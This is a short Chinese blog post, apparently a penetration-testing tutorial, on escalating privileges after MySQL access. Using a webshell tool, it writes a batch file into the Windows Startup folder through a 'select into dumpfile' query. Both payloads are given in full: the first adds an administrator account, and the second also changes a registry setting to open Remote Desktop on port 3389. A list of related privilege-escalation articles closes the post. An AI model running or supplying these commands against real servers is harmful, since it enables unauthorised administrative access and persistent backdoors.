后渗透—— 数据库之开机启动项提权
2020-03-30 18:33
781 查看
开机启动项提权原理:利用mysql,将后门写入开机自启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限甚至是system)
实验环境
- Windows Server 2008 R2 x64
- MySQL-5.5.15-(64-bit).msi
- 菜刀
模拟实验
在菜刀中输入
select "net user zs 123.com /add & net localgroup Administrators zs /add" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"执行
然后双击启动中出现的文件,这时用户创建成功并且是管理员组
也可输入
select "net user zs 123.com /add & net localgroup Administrators zs /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 0 /f" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"同时开启3389端口
这时就可以用桌面远程连接了
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\(windows2003及xp的路径)
- 点赞 5
- 收藏
- 分享
- 文章举报
相关文章推荐
- 后渗透—— 数据库之MOF提权
- 小白日记23:kali渗透测试之提权(三)--WCE、fgdump、mimikatz
- 黑客运用SQL Injection做数据库的渗透
- 渗透测试之提权 (udf提权+mof提权+启动项提权)
- Windows内网渗透提权的几个实用命令
- 菜鸟关于提权渗透的笔记
- msf客户端渗透(三):提权、图形化payload
- 如何“组合拳”渗透开发者的本地数据库
- Windows内网渗透提权的几个实用命令
- 各种提权、渗透经验技巧总结大全(下)
- 菜鸟渗透日记15---linux本地提权(脏牛应用)
- 菜鸟渗透日记17---渗透测试提权之基本信息收集、敏感数据收集、隐藏痕迹
- 黑客运用SQL Injection做数据库的渗透
- 15、渗透测试笔记_数据库注入_20191023
- 提权、渗透、经验、技巧总结大全四
- LINUX之内网渗透提权
- 菜刀渗透提权小结